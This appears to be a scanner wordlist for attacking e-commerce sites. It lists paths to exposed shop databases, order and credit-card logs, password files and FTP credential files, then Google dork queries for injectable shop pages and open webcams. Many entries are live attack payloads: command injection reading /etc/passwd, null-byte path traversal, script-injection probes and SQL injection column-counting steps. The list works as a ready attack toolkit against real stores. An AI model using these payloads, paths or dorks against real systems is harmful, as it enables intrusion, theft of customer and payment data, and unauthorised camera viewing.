/shop/db
/shop/db.xml
/shop/db/
/shop/db/%3f.jsp
/shop/db/database.mdb
/shop/db/merchant_conf
/shop/db/PTSC.mdb
/shop/db_manager.cgi
/shop/DCShop/Auth_data/auth_user_file.txt
/shop/DCShop/Orders/orders.txt
/shop/diag_dbtest.asp
/shop/diagnose.cgi
/shop/docreate.jsp
/shop/dologin.jsp
/shop/dosearch.jsp
/shop/entry.dat
/shop/eshop.pl/seite=;cat%20eshop.pl|
/shop/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
/shop/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template =../../../../../../../etc/passwd&distinct=1
/shop/iclude/
/shop/idbC.dat
/shop/include/func.php
/Shop/info.dat
/shop/info.php
/shop/info.php3
/shop/info.xml
/shop/jadat.dat
/shop/lists.csv
/shop/log/
/shop/log/imglog.txt
/shop/log/index.html
/shop/log/x-errors_php.txt
/shop/log/x-errors_sql.txt
/shop/log/xcartdump.sql
/shop/log_files/
/shop/member_html.cgi?file=;cat%20/etc/passwd|
/shop/member_html.cgi?file=|cat%20/etc/passwd|
/shop/midcart.mdb
/shop/midicart.mdb
/shop/normal_html.cgi?file=../../../../../../etc/issue%00
/shop/normal_html.cgi?file=;cat%20/etc/passwd|
/shop/normal_html.cgi?file=;id|
/shop/normal_html.cgi?file=<script>alert(;\"Vulnerable\" )</script>
/shop/normal_html.cgi?file=|cat%20/etc/passwd|
/shop/normal_html.cgi?file=|id|
/shop/order-shop.dat
/shop/order.log
/shop/order.txt
/shop/order/order.log
/shop/orderdetalis.aspx
/Shop/orders.in
/shop/orders.inc
/shop/orders.log
/shop/orders/jadat.dat
/shop/orders/order-shop.dat
/shop/orders/order.txt
/shop/Orders/orders.txt
/shop/owner
/shop/php_files/site.config.php
/shop/php_files/site.config.php+
/shop/phpinfo.php
/shop/phpinfo.php3
/shop/product.asp
/shop/product.ast
/shop/provider/
/shop/provider/import.php
/shop/provider/product_modify.php
/shop/readme.txt
/shop/registry.dat
/shop/sales.csv
/shop/scripts/
/shop/search.php
/shop/search.php?q='
/shop/secure/
/shop/shop.dat
/shop/shop.db
/Shop/Shop.sql
/shop/shop/shop.dat
/shop/shopdbtest.asp
/shop/show.php
/shop/show.php?q='
/shop/show_cart.inc.php
/shop/Smarty-2.5.0/
/shop/Smarty-2.5.0/Smarty.class.php
/shop/stats.php
/shop/system
/shop/system/
/shop/tep_admin-pr2.1/admin/
/shop/tep_admin-pr2.1/admin/orders.php
/shop/termofuse.html
/shop/test.log
/Shop/track.db
/shop/vars
/shop/vars.txt
/shop/WEB-INF/
/shop/WEB-INF/classes/
/shop/WEB-INF/classes/db.properties
/shop/WEB-INF/lib/
/shop/WEB-INF/lib/mysql-connector-java-2.0.14-bin.jar
/shop/WEB-INF/ShopTags.tld
/shop/WEB-INF/web.warContent
/shop/WEB-INF/web.xml
/shop/Web.Config
/shop/web.xml
/shop/ws%5fftp.ini
/shop/ws_%66tp.ini
/shop/ws_f%74p.ini
/shop/ws_ft%70.ini
/shop/ws_ftp%2eini
/shop/ws_ftp.%69ni
/shop/ws_ftp.i%6ei
/shop/ws_ftp.in%69
/shop/WS_FTP.INI
/shop/WS_FTP.LOG
/shop/WS_FTP.LOG/?open
/shop/WS_FTP.LOG?open
/shop/WSFTP.LOG
/shop?open
/shop_login.asp
/shopa_sessionlist.asp
/shopadmin.asp
/shopadmin.mdb
/shopadmin1.asp
/shopadmin_login.htm
/shopcart/
/shopcart/database/ShopCart2.mdb
/shopcart/ShopCart2.mdb
/ShopCart2.mdb
/shopdb/
/shopdbtest.asp
/shopexd.asp
/shoponline/fpdb/shop.mdb
/shopper
/shopper.cgi?preadd=action&key=PROFA&template=order .log
/shopper.cgi?preadd=action&key=PROFA&template=order 1.log
/shopper.conf
/shopper.exe/cgi-bin/.../shopper.conf
/shopper.exe?display=action&template=order.log
/shopper/
/shopping
/shopping.mdb
/shopping/
/shopping/%3f.jsp
/shopping/admin
/shopping/admin.asp
/shopping/admin/
/shopping/admin/orders.php
/shopping/Auth_data/auth_user_file.txt
/shopping/cartmanager.cgi
/shopping/code.php3
/shopping/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
/shopping/compatible.cgi
/shopping/data.info
/shopping/database/comersus.mdb
/shopping/database/metacart.mdb
/shopping/db_manager.cgi
/shopping/diag_dbtest.asp
/shopping/diagnose.cgi
/shopping/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
/shopping/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template =../../../../../../../etc/passwd&distinct=1
/shopping/idbC.dat
/shopping/info.dat
/shopping/info.xml
/shopping/log_files/
/shopping/midicart.mdb
/shopping/orders/jadat.dat
/shopping/orders/order-shop.dat
/shopping/orders/order.txt
/shopping/Orders/orders.txt
/shopping/resgistry.dat
/shopping/secure/
/shopping/secure/orders/
/shopping/shop.mdb
/shopping/shopadmin_login.htm
/shopping/shopdbtest.asp
/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('te st')</script>","<script>alert('test')</script>
/shopping/shopping.mdb
/shopping/shopping200.mdb
/shopping/shopping300.mdb
/shopping/shopping400.mdb
/shopping/shopping450.mdb
/shopping/shopping500.mdb
/shopping/shopsearch.asp
/shopping/vars.txt
/shopping/Web.Config
/shopping/ws%5fftp.ini
/shopping/ws_%66tp.ini
/shopping/ws_f%74p.ini
/shopping/ws_ft%70.ini
/shopping/ws_ftp%2eini
/shopping/ws_ftp.%69ni
/shopping/ws_ftp.i%6ei
/shopping/ws_ftp.in%69
/shopping/WS_FTP.INI
/shopping/WS_FTP.LOG
/shopping/WS_FTP.LOG/?open
/shopping/WS_FTP.LOG?open
/shopping/WSFTP.LOG
/shopping200.mdb
/shopping300.mdb
/shopping400.mdb
/shopping450.mdb
/shopping500.mdb
/shopping_cart
/shopping_cart/
/shopping_cart/0%20WEB%20CATEGORIES
/shopping_cart/admin/
/shopping_cart/admin/category_detail.php
/shopping_cart/admin/config.inc.php
/shopping_cart/admin/db.sql
/shopping_cart/admin/detail.php
/shopping_cart/admin/footer.php
/shopping_cart/admin/graphics/
/shopping_cart/admin/header.php
/shopping_cart/admin/index.php
/shopping_cart/admin/jscript/
/shopping_cart/admin/list_categories.php
/shopping_cart/admin/mysql.info.php
/shopping_cart/admin/WS_FTP.LOG
/shopping_cart/backlink.js
/shopping_cart/checkout.php
/shopping_cart/checkoutdb.php
/shopping_cart/config.inc.php
/shopping_cart/configure.php
/shopping_cart/WS_FTP.LOG
/ShoppingCart/cart.jsp
/ShoppingCart/orders.inc
/shoppingdirectory/midicart.mdb
/shoppping/administrador.asp
/shoppping/secure/orders.secure
/shoppping/tables.sql
/shopsearch.asp
/show_cart.inc.php
/SiteServer/Admin/
/SiteServer/Admin/commerce/foundation/domain.asp
/SiteServer/Admin/commerce/foundation/driver.asp
/SiteServer/Admin/commerce/foundation/DSN.asp
/SiteServer/admin/findvserver.asp
/SiteServer/admin/findvserver.asp?uid=LDAP_Anonymous&pwd=LdapPasswor d_1
/SiteServer/Admin/knowledge/dsmgr/default.asp
/SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
/SiteServer/Admin/knowledge/persmbr/vs.asp
/SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
/SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
/SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
/SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>
/SiteServer/Publishing/
/SiteServer/Publishing/ViewCode.asp
/store
/store*
/store.mdb
/store/
/store/./
/store/./WEB-INF/
/store/./WEB-INF/classes/
/store/./WEB-INF/lib/
/store/./WEB-INF/ShopTags.tld
/store/./WEB-INF/web.xml
/store//DCShop/dcshop_admin.cgi
/store/?open
/store/_vti_cnf/form_results.htm
/store/_vti_cnf/form_results.html
/store/_vti_cnf/form_results.txt
/store/_vti_cnf/order.log
/store/_vti_cnf/order.txt
/store/admin
/store/admin.dat
/store/admin.pass
/store/admin.passwd
/store/admin/
/store/admin/admin.dat
/Store/admin/Default.asp
/store/Admin_files/
/store/admin_files/_vti_cnf/
/store/Admin_files/_vti_cnf/form_results.txt
/store/Admin_files/_vti_cnf/order.log
/store/Admin_files/myorderlog.txt
/store/Admin_files/order.log
/store/Admin_files/orders.txt
/store/agora.cgi
/store/cart.cgi
/store/cart.pl
/store/cartmanager.cgi
/store/category1.tpl
/store/client.eml
/store/comersus.mdb
/store/comersus/comersus.mdb
/store/comersus/database/comersus.mdb
/store/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
/store/compatible.cgi
/store/create.jsp
/store/customers/
/store/database.dat
/store/database.db
/store/database.nsf
/store/database.sql
/store/database/comersus.mdb
/store/database/sql
/store/daten/
/store/db.xml
/store/db/
/store/db/database.mdb
/store/db/store.mdb
/store/dcshop_admin.cgi
/store/docreate.jsp
/store/dologin.jsp
/store/dosearch.jsp
/store/entry.dat
/store/idbC.dat
/store/index.cgi?page=../../../../../../../../etc/passwd
/store/index.js0x70
/store/info.xml
/store/lib.inc
/store/lib.inc.php
/store/lists.csv
/store/log_files/
/store/order.log
/store/order.sql
/store/orderdetalis.aspx
/store/orders
/Store/orders.inc
/store/orders.log
/store/orders.mdb
/store/orders.sql
/store/pgp_encrypt/cc_store_lib.pm
/store/pgp_encrypt/order_admin.cgi
/store/pgp_encrypt/pgp_lib.pm
/store/pgp_encrypt/print_invoice.cgi
/store/pgp_encrypt/process.cgi
/store/pgp_encrypt/store_admin.cgi
/store/pgp_encrypt/store_params.cgi
/store/pgp_encrypt/validate_card.pm
/store/quikstore.cgi?store='
/store/secure/
/store/show_cart.inc.php
/store/stats.php
/store/store.dat
/store/store.db
/store/store.log
/store/store.mdb
/store/store.nsf
/store/store.sql
/store/storeadmin
/store/storeadmin/
/store/temp_customers/
/store/temp_orders/
/store/test.log
/store/vars.txt
/store/WEB-INF/
/store/WEB-INF/classes/
/store/WEB-INF/lib/
/store/WEB-INF/ShopTags.tld
/store/WEB-INF/web.xml
/store/Web.Config
/store/web.xml
/store/ws%5fftp.ini
/store/ws_%66tp.ini
/store/ws_f%74p.ini
/store/ws_ft%70.ini
/store/ws_ftp%2eini
/store/ws_ftp.%69ni
/store/ws_ftp.i%6ei
/store/ws_ftp.in%69
/store/WS_FTP.INI
/store/WS_FTP.LOG
/store/WS_FTP.LOG/?open
/store/WS_FTP.LOG?open
/store/WSFTP.LOG
/StoreAdmin
/StoreAdmin/
/StoreDB
/StoreDB/
/storefront.mdb
/storefrontpro50.tem/
/storemgr/
/stores/
/stores/registry.dat
/usersorder/
/usersorders/
/virtuastore.mdb
/virtuastore/
/virtuastore/database/virtuastore.mdb
/Web_Store
/web_store.cgi
/Web_store/
/Web_store/Admin_files/
/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
/Web_store/web_store.cgi?page=../../../../../../../../etc/passw
/webcart
/webcart-lite
/webcart-lite/
/webcart-lite/config/clients.txt
/webcart-lite/config/import.txt
/webcart-lite/orders/import.txt
/webcart/
/webcart/carts
/webcart/carts/
/webcart/config/
/webcart/config/clients.txt
/webcart/orders/
/webcart/orders/carts/.txt
/webcart/orders/import.txt
/webcash
/webcash/
/webcash/.dbusers.db
/webcash/.htaccess
/webcash/.htlilyfire
/webcash/.htpass-4.new
/webcash/.htpasswd
/webcash/.htpasswd.aknk
/webcash/.htpasswd.nten
/webcash/.htpasswd.slez
/webcash/.htusers
/webcash/.passwrd
/webcash/.pwd
/webcash/_privat/.htpasswd
/webcash/access/.htpasswd
/webcash/acctman/info/.htpasswd
/webcash/admin/db/htpasswd
/webcash/ats/logs/writeto.txt
/webcash/ccbill/.htpasswd
/webcash/ccbill/members/.htpasswd
/webcash/ccbill/password/.htpasswd
/webcash/ccbill/secure/ccbill.log
/webcash/cgi-bin/am/codes/htpasswd
/webcash/cgi-bin/database/passwords
/webcash/cgi-bin/ib/data/htpasswd
/webcash/cgi-bin/mastergate/passwords
/webcash/cgi-bin/passwd/.htpasswd
/webcash/cgi-bin/passwords
/webcash/cgi-bin/test.cgi
/webcash/cgi-bin2/ampro/info/.htpasswd
/webcash/cgibin/.htpasswd
/webcash/cgibin/ibp5/passwords.temp
/webcash/cgibin/mastergate/passwords
/webcash/cgibin/members/htdata/.htpasswd
/webcash/cgibin/passwords
/webcash/client.log
/webcash/cohfmembers/.htpasswd
/webcash/crontab.txt
/webcash/data/passwdfile
/webcash/database/.pnppasswd
/webcash/deep/.htpasswd
/webcash/dmr/.htpasswd.ass
/webcash/drowssap/.htpasswd
/webcash/expire.txt
/webcash/htusers
/WebShop
/Webshop*
/WebShop/
/Webshop/*
/WebShop/logs/
/WebShop/logs/cc.txt
/WebShop/logs/ck.log
/WebShop/templates/cc.txt
/Webstore/
/webstore/addcustomer.php
/webstore/admin/addcustomer.php
/webstore/Admin_files/
/xcart/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd
/xdatabase/MFIIstore.ldb
/xdatabase/MFIIstore.mdb
/xshop.mdb
/~authorizenet.cgi
/~cgi-bin/authorizenet.cgi/
/~webcash
/~webcash/
intitle:"Live View / - AXIS"
intitle:"snc-rz30 home"
intitle:"WJ-NT104 Main"
inurl:".php?cat="
inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"/store/"
inurl:".php?cat=" intext:"add to cart"
inurl:".php?cat=" intext:"boutique"
inurl:".php?cat=" intext:"Buy Now"
inurl:".php?cat=" intext:"shopping"
inurl:".php?cat=" intext:"Toys"
inurl:".php?cat=" intext:"View cart"
inurl:".php?cat="+intext:"/Buy Now/"+site:.net
inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?catid="
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"Toys"
inurl:".php?catid=" intext:"View cart"
inurl:".php?cid="
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"Toys"
inurl:".php?cid=" intext:"View cart"
inurl:".php?cid="+intext:"online+betting"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"toys"
inurl:".php?id=" intext:"View cart"
inurl:"viewerframe?mode=motion"
inurl:IndexFrame.shtml "Axis Video Server"
inurl:LvAppl Intitle:liveapplet
website.com/index.php?id=1 order by 1–
website.com/index.php?id=1 order by 2–
website.com/index.php?id=1 order by 3–
website.com/index.php?id=1 order by 4–